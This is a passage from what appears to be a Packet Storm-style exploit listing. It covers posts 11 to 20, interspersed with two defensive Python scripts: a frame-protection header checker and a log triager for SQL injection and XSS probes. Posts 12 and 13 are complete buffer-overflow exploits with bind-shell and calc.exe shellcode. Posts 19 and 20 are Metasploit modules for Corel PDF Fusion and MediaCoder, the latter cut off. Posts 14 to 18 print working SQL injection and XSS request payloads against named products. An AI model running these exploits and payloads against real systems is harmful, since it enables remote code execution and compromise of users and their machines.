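        result["allowed_origin"] = as_written.split()[1]
    else:
        result["verdict"] = INVALID
    return result


# Constructed sample responses from a hypothetical Confluence-like server.
UNPROTECTED = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html;charset=UTF-8\r\n"
    "Set-Cookie: JSESSIONID=constructed; Path=/; HttpOnly\r\n"
    "\r\n"
    "<html><body id=\"search-results-body\">...</body></html>"
)
HARDENED = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html;charset=UTF-8\r\n"
    "x-frame-options: DENY\r\n"
    "\r\n"
    "<html>...</html>"
)
CONFLICTING = (
    "HTTP/1.1 200 OK\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "X-Frame-Options: DENY\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, resp in (("unprotected", UNPROTECTED), ("hardened", HARDENED), ("conflicting", CONFLICTING)):
        print(f"{label:12s} -> {assess_frame_protection(resp)['verdict']}")
```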
11. Description : DD-WRT suffers from cross site request forgery and remote command injection vulnerabilities.
Author : cyoung
Source : DD-WRT 24-sp2 CSRF / Command Injection ≈ Packet Storm
Code :
DD-WRT v24-sp2 is prone to command injection from specially crafted configuration values containing shell meta-characters. A remote attacker can potentially use CSRF from an authenticated client to execute commands on the router as the root user. Successful exploitation can result in system wide compromise or a denial of service condition depending on the commands being injected.

This bug was reported via the DD-WRT bug tracker on November 20, 2012 but there does not appear to be ongoing development in the project.
12. Description : Ultra Mini HTTPd version 1.21 suffers from a stack buffer overflow vulnerability. This exploit binds a shell.
Author : superkojiman
Source : Ultra Mini HTTPd 1.21 Buffer Overflow ≈ Packet Storm
Code :
# Exploit Title: Ultra Mini HTTPD stack buffer overflow
# Date: 10 July 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.picolix.jp/
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Version: 1.21
# Tested on: Windows XP Professional SP2, English
#
# Description:
# A buffer overflow is triggered when requesting a very long
# resource name.
#
# Note: Python 2 script (byte-string literals and the print statement).

import socket
import struct

# msfpayload windows/shell_bind_tcp R | \
# msfencode -b "\x00\x0a\x0d\x20\x0b\x09\x0c"
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
shellcode = (
    "\xba\x1f\xb5\xae\xa1\xdd\xc4\xd9\x74\x24\xf4\x5e\x33\xc9" +
    "\xb1\x56\x31\x56\x13\x83\xc6\x04\x03\x56\x10\x57\x5b\x5d" +
    "\xc6\x1e\xa4\x9e\x16\x41\x2c\x7b\x27\x53\x4a\x0f\x15\x63" +
    "\x18\x5d\x95\x08\x4c\x76\x2e\x7c\x59\x79\x87\xcb\xbf\xb4" +
    "\x18\xfa\x7f\x1a\xda\x9c\x03\x61\x0e\x7f\x3d\xaa\x43\x7e" +
    "\x7a\xd7\xab\xd2\xd3\x93\x19\xc3\x50\xe1\xa1\xe2\xb6\x6d" +
    "\x99\x9c\xb3\xb2\x6d\x17\xbd\xe2\xdd\x2c\xf5\x1a\x56\x6a" +
    "\x26\x1a\xbb\x68\x1a\x55\xb0\x5b\xe8\x64\x10\x92\x11\x57" +
    "\x5c\x79\x2c\x57\x51\x83\x68\x50\x89\xf6\x82\xa2\x34\x01" +
    "\x51\xd8\xe2\x84\x44\x7a\x61\x3e\xad\x7a\xa6\xd9\x26\x70" +
    "\x03\xad\x61\x95\x92\x62\x1a\xa1\x1f\x85\xcd\x23\x5b\xa2" +
    "\xc9\x68\x38\xcb\x48\xd5\xef\xf4\x8b\xb1\x50\x51\xc7\x50" +
    "\x85\xe3\x8a\x3c\x6a\xde\x34\xbd\xe4\x69\x46\x8f\xab\xc1" +
    "\xc0\xa3\x24\xcc\x17\xc3\x1f\xa8\x88\x3a\x9f\xc9\x81\xf8" +
    "\xcb\x99\xb9\x29\x73\x72\x3a\xd5\xa6\xd5\x6a\x79\x18\x96" +
    "\xda\x39\xc8\x7e\x31\xb6\x37\x9e\x3a\x1c\x4e\x98\xf4\x44" +
    "\x03\x4f\xf5\x7a\xb2\xd3\x70\x9c\xde\xfb\xd4\x36\x76\x3e" +
    "\x03\x8f\xe1\x41\x61\xa3\xba\xd5\x3d\xad\x7c\xd9\xbd\xfb" +
    "\x2f\x76\x15\x6c\xbb\x94\xa2\x8d\xbc\xb0\x82\xc4\x85\x53" +
    "\x58\xb9\x44\xc5\x5d\x90\x3e\x66\xcf\x7f\xbe\xe1\xec\xd7" +
    "\xe9\xa6\xc3\x21\x7f\x5b\x7d\x98\x9d\xa6\x1b\xe3\x25\x7d" +
    "\xd8\xea\xa4\xf0\x64\xc9\xb6\xcc\x65\x55\xe2\x80\x33\x03" +
    "\x5c\x67\xea\xe5\x36\x31\x41\xac\xde\xc4\xa9\x6f\x98\xc8" +
    "\xe7\x19\x44\x78\x5e\x5c\x7b\xb5\x36\x68\x04\xab\xa6\x97" +
    "\xdf\x6f\xd6\xdd\x7d\xd9\x7f\xb8\x14\x5b\xe2\x3b\xc3\x98" +
    "\x1b\xb8\xe1\x60\xd8\xa0\x80\x65\xa4\x66\x79\x14\xb5\x02" +
    "\x7d\x8b\xb6\x06"
)

# 7C941EED , JMP ESP , ntdll.dll
payload = "A" * 5392 + struct.pack("<I", 0x7C941EED)
payload += "\x81\xc4\xf0\xea\xff\xff" + shellcode + "B" * 4230

print "[+] sending payload, length", len(payload)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.37.175", 80))
buf = (
    "GET /" + payload + " HTTP/1.1\r\n" +
    "Host: 192.168.37.175" + "\r\n\r\n"
)
s.send(buf)
s.close()
13. Description : Mediacoder version 0.8.23.5530 SEH buffer overflow exploit that spawns calc.exe
Author : metacom
Source : Mediacoder 0.8.23.5530 SEH Buffer Overflow ≈ Packet Storm
Code :
#!/usr/bin/python
# Python 2 script (byte-string literals and the print statement).
print """
[+]Exploit Title: Mediacoder 0.8.23.5530 SEH Buffer Overflow
[+]Download All Product: http://www.mediacoderhq.com/editions.html
[+]Vulnerable Product:!
[+]Mediacoder 0.8.23.5530
[+]Vulnerabilities File Format:lst,m3u
[+]Other programs from http://www.mediacoderhq.com/editions.html not tested and may be vulnerable
[+]Date (found): 17.07.2013
[+]Date (publish): 17.07.2013
[+]Founder: metacom
[+]RST
[+]Tested on: Windows Xp pro-sp3 English
"""

buffer = "http://" + "\x41" * 845
nseh = "\xEB\x06\x90\x90"
seh = "\xD0\x12\xB0\x6A"  # 6AB012D0 5F POP EDI
nops = "\x90" * 70

# msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' -t c
shell = (
    "\xbf\x8e\xa0\x35\xac\xda\xda\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
    "\x33\x83\xc3\x04\x31\x7b\x0e\x03\xf5\xae\xd7\x59\xf5\x47\x9e"
    "\xa2\x05\x98\xc1\x2b\xe0\xa9\xd3\x48\x61\x9b\xe3\x1b\x27\x10"
    "\x8f\x4e\xd3\xa3\xfd\x46\xd4\x04\x4b\xb1\xdb\x95\x7d\x7d\xb7"
    "\x56\x1f\x01\xc5\x8a\xff\x38\x06\xdf\xfe\x7d\x7a\x10\x52\xd5"
    "\xf1\x83\x43\x52\x47\x18\x65\xb4\xcc\x20\x1d\xb1\x12\xd4\x97"
    "\xb8\x42\x45\xa3\xf3\x7a\xed\xeb\x23\x7b\x22\xe8\x18\x32\x4f"
    "\xdb\xeb\xc5\x99\x15\x13\xf4\xe5\xfa\x2a\x39\xe8\x03\x6a\xfd"
    "\x13\x76\x80\xfe\xae\x81\x53\x7d\x75\x07\x46\x25\xfe\xbf\xa2"
    "\xd4\xd3\x26\x20\xda\x98\x2d\x6e\xfe\x1f\xe1\x04\xfa\x94\x04"
    "\xcb\x8b\xef\x22\xcf\xd0\xb4\x4b\x56\xbc\x1b\x73\x88\x18\xc3"
    "\xd1\xc2\x8a\x10\x63\x89\xc0\xe7\xe1\xb7\xad\xe8\xf9\xb7\x9d"
    "\x80\xc8\x3c\x72\xd6\xd4\x96\x37\x28\x9f\xbb\x11\xa1\x46\x2e"
    "\x20\xac\x78\x84\x66\xc9\xfa\x2d\x16\x2e\xe2\x47\x13\x6a\xa4"
    "\xb4\x69\xe3\x41\xbb\xde\x04\x40\xd8\x81\x96\x08\x31\x24\x1f"
    "\xaa\x4d"
)

junk = buffer + nseh + seh + nops + shell

filename = "exploit.lst"  # You can change the format m3u
file = open(filename, "w")
file.writelines(junk)
file.close()
print "File Is created"
14. Description : MintBoard version 0.3 suffers from cross site scripting vulnerabilities
Author : Canberk BOLAT
Source : MintBoard 0.3 Cross Site Scripting ≈ Packet Storm
Code :
Information
--------------------
Name : XSS Vulnerabilities in MintBoard
Software : MintBoard 0.3 and possibly below.
Vendor Homepage : http://www.mintboard.com
Vulnerability Type : Cross-Site Scripting
Severity : Medium
Researcher : Canberk Bolat
Advisory Reference : NS-13-001

Description
--------------------
Mintboard is a forum software that aims to do less and do it better. An attempt to say goodbye to the bloat found in forum software.

Details
--------------------
MintBoard is affected by XSS vulnerabilities in version 0.3.

http://example.com/?login=3 (POST: name)
http://example.com/?login=3 (POST: pass)
http://example.com/?signup=3 (POST: name)
http://example.com/?signup=3 (POST: pass)

You can read the full article about Cross-Site Scripting and SQL Injection vulnerabilities from here:
Cross-site Scripting (XSS): https://www.mavitunasecurity.com/xss-vulnerabilities-in-mintboard/

Solution
--------------------
-

Advisory Timeline
--------------------
06/12/2012 - First contact
10/07/2013 - Advisory Released

Credits
--------------------
It has been discovered on testing of Netsparker, Web Application Security Scanner.

References
--------------------
Vendor Url / Patch :
MSL Advisory Link : https://www.mavitunasecurity.com/xss-vulnerabilities-in-mintboard/
Netsparker Advisories : https://www.mavitunasecurity.com/netsparker-advisories/

About Netsparker
--------------------
Netsparker® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on. Netsparker's unique detection and exploitation techniques allow it to be dead accurate in reporting, hence it's the first and the only False Positive Free web application security scanner.

--
Netsparker Advisories, <advisories@mavitunasecurity.com>
Homepage, http://www.mavitunasecurity.com/netsparker-advisories/
15. Description : MiniBB version 3.0.0 suffers from cross site scripting and remote SQL injection vulnerabilities.
Author : Omar Kurt
Source : MiniBB 3.0.0 Cross Site Scripting / SQL Injection ≈ Packet Storm
Code :
Information
--------------------
Name : XSS and SQL Injection Vulnerabilities in MiniBB
Software : MiniBB 3.0.0 and possibly below.
Vendor Homepage : http://www.minibb.com
Vulnerability Type : Cross-Site Scripting and SQL Injection
Severity : Critical
Researcher : Omar Kurt
Advisory Reference : NS-13-002

Description
--------------------
miniBB® is a standalone, open source program for building your own Internet forum, and it's free to download. Compared to the other forum software available on the market, miniBB just brings what it's created for: an easy, lite, and speedy quick forum.

Details
--------------------
MiniBB is affected by XSS and SQL Injection vulnerabilities in version 3.0.0.

XSS:
http://example.com/bb_admin.php (GET - params: forum_name, forum_group, forum_icon, whatus, forum_desc)

SQL Injection:
http://example.com/bb_admin.php?action=searchusers2&searchus=id&whatus='+(SELECT1 FROM (SELECT SLEEP(25))A)+'

You can read the full article about Cross-Site Scripting and SQL Injection vulnerabilities from here:
Cross-site Scripting (XSS): https://www.mavitunasecurity.com/crosssite-scripting-xss/
SQL Injection: https://www.mavitunasecurity.com/sql-injection/

Solution
--------------------
-

Advisory Timeline
--------------------
26/02/2013 - First contact
15/03/2013 - Fix & New MiniBB version released
11/07/2013 - Advisory released

Credits
--------------------
It has been discovered on testing of Netsparker Web Application Security Scanner.

References
--------------------
Vendor Url / Patch : http://www.minibb.com/forums/news-9/minibb-3.0.1-released-stable-fixed-secured-dedicated-6059.html
MSL Advisory Link : https://www.mavitunasecurity.com/xss-and-sql-injection-vulnerabilities-in-minibb/
Netsparker Advisories : https://www.mavitunasecurity.com/netsparker-advisories/

About Netsparker
--------------------
Netsparker® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on. Netsparker's unique detection and exploitation techniques allow it to be dead accurate in reporting, hence it's the first and the only False Positive Free web application security scanner.

--
Netsparker Advisories, <advisories@mavitunasecurity.com>
Homepage, http://www.mavitunasecurity.com/netsparker-advisories/
16. Description : Serendipity version 1.6.2 suffers from multiple cross site scripting vulnerabilities
Author : Omar Kurt
Source : Serendipity 1.6.2 Cross Site Scripting ≈ Packet Storm
Code :
Information
--------------------
Name : XSS Vulnerabilities in Serendipity
Software : Serendipity 1.6.2 and possibly below.
Vendor Homepage : http://www.s9y.org/
Vulnerability Type : Cross-Site Scripting
Severity : Medium
Researcher : Omar Kurt
Advisory Reference : NS-13-003

Description
--------------------
Serendipity is a PHP-powered weblog application which gives the user an easy way to maintain an online diary, weblog or even a complete homepage. While the default package is designed for the casual blogger, Serendipity offers a flexible, expandable and easy-to-use framework with the power for professional applications.

Details
--------------------
Serendipity is affected by XSS vulnerabilities in version 1.6.2.

http://example.com/serendipity_admin_image_selector.php?serendipity%5Btextarea%5D=%27%2Balert(0x000887)%2B%27&serendipity%5Baction%5D=208.100.0.117&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117

http://example.com/serendipity_admin_image_selector.php?serendipity%5Bhtmltarget%5D=%27%2Balert(0x000A02)%2B%27&serendipity%5Baction%5D=208.100.0.117&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117

You can read the full article about Cross-Site Scripting from here:
http://www.mavitunasecurity.com/crosssite-scripting-xss/

Solution
--------------------
The vendor fixed this vulnerability in the new version. Please see the references.

Advisory Timeline
--------------------
26/02/2013 - First contact
04/03/2013 - Sent the details
10/07/2013 - Advisory released

Credits
--------------------
It has been discovered on testing of Netsparker, Web Application Security Scanner - http://www.mavitunasecurity.com/netsparker/.

References
--------------------
Vendor Url / Patch : -
MSL Advisory Link : https://www.mavitunasecurity.com/xss-vulnerabilities-in-serendipity/
Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/

About Netsparker
--------------------
Netsparker® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on. Netsparker's unique detection and exploitation techniques allow it to be dead accurate in reporting, hence it's the first and the only False Positive Free web application security scanner.

--
Netsparker Advisories, <advisories@mavitunasecurity.com>
Homepage, http://www.mavitunasecurity.com/netsparker-advisories/
17. Description : McAfee ePO version 4.6.6 Build 176 suffers from cross site scripting and remote SQL injection vulnerabilities.
Author : Nuri Fattah
Source : McAfee ePO 4.6.6 Cross Site Scripting / SQL Injection ≈ Packet Storm
Code :
Classification: NON SENSITIVE INFORMATION RELEASABLE TO THE PUBLIC

Multiple vulnerabilities in McAfee ePO 4.6.6

Affected Product: McAfee ePO 4.6.6 Build 176 & (potentially) earlier versions

Timeline:
08 June 2013 - Vulnerability found
12 June 2013 - Vendor informed
12 June 2013 - Vendor replied/confirmed & opened service ticket
12 July 2013 - Vendor responded with dates for solutions

Credits: Nuri Fattah of NATO / NCIRC (www.ncirc.nato.int)
CVE: To be assigned
NCIRC ID: NCIRC-2013127-01

Description:
Multiple vulnerabilities, such as Cross-Site Scripting (XSS) and SQL injection were identified in the latest version of McAfee ePO (4.6.6). All identified vulnerabilities were discovered post authentication.

Vulnerability Details:

1. SQL injection
a. GET /core/showRegisteredTypeDetails.do?registeredTypeID=epo.rt.computer&uid=6waitfor%20delay'0%3a0%3a20'--&index=0&datasourceID=&orion.user.security.token=2LoWTAOfWJ4ZCjxY&ajaxMode=standard HTTP/1.1
b. /EPOAGENTMETA/DisplayMSAPropsDetail.do?registeredTypeID=epo.rt.computer&uid=1;%20WAITFOR%20DELAY%20'0:0:0';--&datasourceID=ListDataSource.orion.dashboard.chart.datasource.core.queryFactory%3Aquery.2&index=0 HTTP/1.1

McAfee Solution:
Item "a" will be addressed in ePO 4.6.7 due out in late Q3 2013.
Item "b" has been addressed per Security Bulletin SB10043. (https://kc.mcafee.com/corporate/index?page=content&id=SB10043)

2. Reflected XSS
a. POST /core/loadDisplayType.do HTTP/1.1
displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard
b. POST /console/createDashboardContainer.do HTTP/1.1
displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard
c. POST /console/createDashboardContainer.do HTTP/1.1
elementId=customURL.dashboard.factory%3Ainstance&index=2&pageid=30&width=1118&height=557&refreshInterval=5&refreshIntervalUnit=MIN&filteringEnabled=false&monitorUrl=http%3A%2F%2Fwww.xxxx.com"/></iframe><script>alert(111057)</script>&orion.user.security.token=9BslgbJEv2JqQy3k&ajaxMode=standard
d. GET /ComputerMgmt/sysDetPanelBoolPie.do?uid=1";</script><script>alert(147981)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1
e. GET /ComputerMgmt/sysDetPanelQry.do?uid=<script>alert(149031)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1
f. GET /ComputerMgmt/sysDetPanelQry.do?uid=>"'><script>alert(30629)</script>&orion.user.security.token=>"'><script>alert(30629)</script>&ajaxMode=>"'><script>alert(30629)</script> HTTP/1.1
g. GET /ComputerMgmt/sysDetPanelSummary.do?uid=<script>alert(146243)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1
h. GET /ComputerMgmt/sysDetPanelSummary.do?uid=>"'><script>alert(30565)</script>&orion.user.security.token=>"'><script>alert(30565)</script>&ajaxMode=>"'><script>alert(30565)</script> HTTP/1.1

McAfee Solution:
Each of these items will be addressed in ePO 4.6.7 due out in late Q3 2013.

Nuri FATTAH CTR
NATO Communications and Information Agency
Engineering & Vulnerability Management Sections
NATO Information Assurance Technical Centre
SHAPE, 7010 Mons, Belgium
T: +32 6544 6140
F: +32 6544 5414
SHAPE NCN: 254 6140
E: nuri.fattah@ncirc.nato.int
W: www.ncirc.nato.int
18. Description : BMC Service Desk Express (SDE) version 10.2.1.95 suffers from cross site scripting and remote SQL injection vulnerabilities.
Author : Nuri Fattah
Source : BMC Service Desk Express 10.2.1.95 XSS / SQL Injection ≈ Packet Storm
Code :
Classification: NON SENSITIVE INFORMATION RELEASABLE TO THE PUBLIC

Multiple vulnerabilities in BMC SERVICE DESK EXPRESS (SDE) Version 10.2.1.95

Affected Product: BMC SERVICE DESK EXPRESS (SDE) Version 10.2.1.95

Timeline:
07 June 2013 - Vulnerability found
12 June 2013 - Vendor informed
17 June 2013 - Vendor replied/confirmed & opened service ticket

Credits: Nuri Fattah of NATO / NCIRC (www.ncirc.nato.int)
CVE: To be assigned
NCIRC ID: NCIRC-2013127-02

Description:
Multiple vulnerabilities, including Cross-Site Scripting (XSS) and SQL injection were identified in the latest version of BMC SERVICE DESK EXPRESS

Vulnerability Details:

1. SQL injection
a. /SDE/DashBoardGUI.aspx vuln parameter: [ASPSESSIONIDASSRATTQ cookie]
b. /SDE/DashBoardGUI.aspx vuln parameter: [TABLE_WIDGET_1 cookie]
c. /SDE/DashBoardGUI.aspx vuln parameter: [TABLE_WIDGET_2 cookie]
d. SDE/DashBoardGUI.aspx vuln parameter: [browserDateTimeInfo cookie]
e. /SDE/DashBoardGUI.aspx vuln parameter: [browserNumberInfo cookie]
f. /SDE/login.aspx vuln parameter: [UID]

2. Reflected XSS
a. /SDE/QV_admin.aspx vuln parameter: [SelTab]
b. /SDE/QV_grid.aspx vuln parameter: [CallBack]
c. /SDE/commonhelp.aspx vuln parameter: [HelpPage]

example:
GET /SDE/QV_grid.aspx?QuerySeq=1068&CondVal=1%40V1%40ADMINISTRATION%401&CallBack=parent.parent.frames.TmInputs.callBack(doGridDataCallBack.arguments[0]);</script><script>alert(99817)</script>&ViewType=g&bRefresh= HTTP/1.1

Solution:
No Solution has yet been provided. Please contact the vendor.
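The advisories in posts 14 to 18 all share two request shapes (time-based blind SQL injection probes using MySQL SLEEP() or MSSQL WAITFOR DELAY, and reflected `<script>` payloads in parameters), and post 12 adds a third (an absurdly long request target). As an added example, not from any of these advisories or from the NCIRC or Netsparker teams, the Python below runs that detection logic over constructed access-log lines in Apache combined format; the length threshold, the RFC 5737 client addresses and the log lines themselves are assumptions.

```python
"""Triage web-server access logs for the request patterns seen in the
advisories above. Added example; the log lines are constructed, not captured."""

import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Apache/nginx combined log format: client - - [ts] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Time-based blind SQLi markers: MySQL SLEEP(n) and MSSQL WAITFOR DELAY 'h:m:s'.
# No word boundary before WAITFOR: the ePO probe above glues it to a digit ("6waitfor").
SQLI_TIME_RE = re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)|WAITFOR\s+DELAY\s*'[^']*'", re.IGNORECASE)
# Reflected XSS probes: an opening <script tag anywhere in the decoded target.
XSS_RE = re.compile(r"<\s*script\b", re.IGNORECASE)

# The Ultra Mini HTTPd overflow needs a request target of roughly 9.6 KB;
# ordinary targets are far shorter. The threshold is an assumption.
MAX_TARGET_LEN = 4096


def decode_target(target: str) -> str:
    """URL-decode a request target repeatedly (bounded) so double-encoded
    payloads such as %253Cscript%253E are seen as <script>."""
    current = target
    for _ in range(3):
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current = decoded
    return current


def classify(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for one log line, or None when nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    decoded = decode_target(target)
    tags: List[str] = []
    if SQLI_TIME_RE.search(decoded):
        tags.append("sqli-time-based")
    if XSS_RE.search(decoded):
        tags.append("xss-script-tag")
    if len(target) > MAX_TARGET_LEN:
        tags.append("overlong-target")
    if not tags:
        return None
    return {
        "client": m.group("client"),
        "path": decoded.split("?", 1)[0][:80],   # truncated so a finding stays loggable
        "tags": tags,
        "status": int(m.group("status")),
    }


def triage(lines: List[str]) -> List[Dict[str, object]]:
    """Run classify() over every line and keep only the findings, in order."""
    return [f for f in (classify(line) for line in lines) if f]


# Constructed sample log (RFC 5737 addresses, fictitious hosts and timestamps).
SAMPLE_LOG = [
    # MiniBB-style time-based SQLi probe, quote and spaces URL-encoded
    '192.0.2.10 - - [11/Jul/2013:10:00:01 +0000] "GET /bb_admin.php?action=searchusers2'
    '&searchus=id&whatus=%27+(SELECT+1+FROM+(SELECT+SLEEP(25))A)+%27 HTTP/1.1" 200 5120 "-" "curl/7.29"',
    # McAfee ePO-style MSSQL WAITFOR DELAY probe
    '192.0.2.11 - - [11/Jul/2013:10:00:02 +0000] "GET /core/showRegisteredTypeDetails.do'
    '?registeredTypeID=epo.rt.computer&uid=6waitfor%20delay%270%3a0%3a20%27--&index=0 HTTP/1.1" 200 910 "-" "curl/7.29"',
    # Reflected script tag in a parameter
    '192.0.2.12 - - [11/Jul/2013:10:00:03 +0000] "GET /ComputerMgmt/sysDetPanelQry.do'
    '?uid=%3Cscript%3Ealert(149031)%3C/script%3E&ajaxMode=standard HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    # Benign search request
    '192.0.2.13 - - [11/Jul/2013:10:00:04 +0000] "GET /dosearchsite.action?queryString=apple HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    # Ultra Mini HTTPd-style overlong request target
    '192.0.2.14 - - [11/Jul/2013:10:00:05 +0000] "GET /' + "A" * 9000 + ' HTTP/1.1" 400 0 "-" "-"',
    # Double-encoded script tag
    '192.0.2.15 - - [11/Jul/2013:10:00:06 +0000] "GET /ComputerMgmt/sysDetPanelSummary.do'
    '?uid=%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding["client"], finding["status"], ",".join(finding["tags"]), finding["path"])
```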
19. Description : This Metasploit module exploits a stack-based buffer overflow vulnerability in version 1.11 of Corel PDF Fusion. The vulnerability exists while handling a XPS file with long entry names. In order for the payload to be executed, an attacker must convince the target user to open a specially crafted XPS file with Corel PDF Fusion. By doing so, the attacker can execute arbitrary code as the target user.
Author : juan vazquez, Kaveh Ghaemmaghami
Source : Corel PDF Fusion Stack Buffer Overflow ≈ Packet Storm
Code :
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex/zip'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Corel PDF Fusion Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow vulnerability in version 1.11 of
        Corel PDF Fusion. The vulnerability exists while handling a XPS file with long entry
        names. In order for the payload to be executed, an attacker must convince the target
        user to open a specially crafted XPS file with Corel PDF Fusion. By doing so, the
        attacker can execute arbitrary code as the target user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Kaveh Ghaemmaghami', # Vulnerability discovery
          'juan vazquez'        # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-3248' ],
          [ 'OSVDB', '94933' ],
          [ 'BID', '61010' ],
          [ 'URL', 'http://secunia.com/advisories/52707/' ]
        ],
      'Platform'       => [ 'win' ],
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 4000
        },
      'Targets'        =>
        [
          # Corel PDF Fusion 1.11 (build 2012/04/25:21:00:00)
          # CorelFusion.exe 2.6.2.0
          # ret from unicode.nls
          # call dword ptr ss:[ebp+0x30]
          # tested over Windows XP SP3 updates
          [ 'Corel PDF Fusion 1.11 / Windows XP SP3', { 'Ret' => 0x00280b0b, 'Offset' => 4640 } ]
        ],
      'DisclosureDate' => 'Jul 08 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The output file name.', 'msf.xps'])
      ], self.class)
  end

  def exploit
    template = [
      "[Content_Types].xml",
      "_rels/.rels",
      "docProps/thumbnail.jpeg",
      "docProps/core.xml",
      "FixedDocSeq.fdseq",
      "Documents/1/Pages/_rels/1.fpage.rels",
      "Documents/1/_rels/FixedDoc.fdoc.rels",
      "Documents/1/FixedDoc.fdoc",
      "Documents/1/Structure/Fragments/1.frag",
      "Documents/1/Structure/DocStructure.struct",
      "Documents/1/Pages/1.fpage",
    ]

    xps = Rex::Zip::Archive.new
    template.each do |k|
      xps.add_file(k, rand_text_alpha(10 + rand(20)))
    end

    resources_length = "Resources/".length

    sploit = "Resources/"
    sploit << payload.encoded
    sploit << rand_text(target['Offset'] - sploit.length)
    sploit << generate_seh_record(target.ret)
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset'] + 8 - resources_length}").encode_string # 8 => seh_record length
    sploit << rand_text(1500) # Trigger exception

    xps.add_file(sploit, rand_text_alpha(10 + rand(20)))

    print_status("Creating '#{datastore['FILENAME']}' file...")
    file_create(xps.pack)
  end

end
20. Description : This Metasploit module exploits a buffer overflow in MediaCoder 0.8.22. The vulnerability occurs when adding an .m3u, allowing arbitrary code execution under the context of the user. DEP bypass via ROP is supported on Windows 7, since the MediaCoder runs with DEP. This Metasploit module has been tested successfully on MediaCoder 0.8.21.5539 to 0.8.22.5530 over Windows XP SP3 and Windows 7 SP0.
Author : metacom
Source : MediaCoder .M3U Buffer Overflow ≈ Packet Storm
Code :
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MediaCoder .M3U Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in MediaCoder 0.8.22. The vulnerability
        occurs when adding an .m3u, allowing arbitrary code execution under the context of
        the user. DEP bypass via ROP is supported on Windows 7, since the MediaCoder runs
        with DEP. This module has been tested successfully on MediaCoder 0.8.21.5539 to
        0.8.22.5530 over Windows XP SP3 and Windows 7 SP0.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metacom',                              # Vulnerability discovery and PoC
          'modpr0be <modpr0be[at]spentera.com>',  # Metasploit module
          'otoy <otoy[at]spentera.com>'           # Metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '94522' ],
          [ 'EDB', '26403' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'Space'           => 1200,
          'BadChars'        => "\x00\x5c\x40\x0d\x0a",
          'DisableNops'     => true,
          'StackAdjustment' => -3500
        },
      'Targets'        =>
        [
          [ 'MediaCoder 0.8.21 - 0.8.22 / Windows XP SP3 / Windows 7 SP0',
            {
              # stack pivot (add esp,7ac;pop pop pop pop ret from postproc-52.dll)
              'Ret'    => 0x6afd4435,
              'Offset' => 849,
              'Max'    => 5000
            }
          ],
        ],
      'Privileged'     => false,
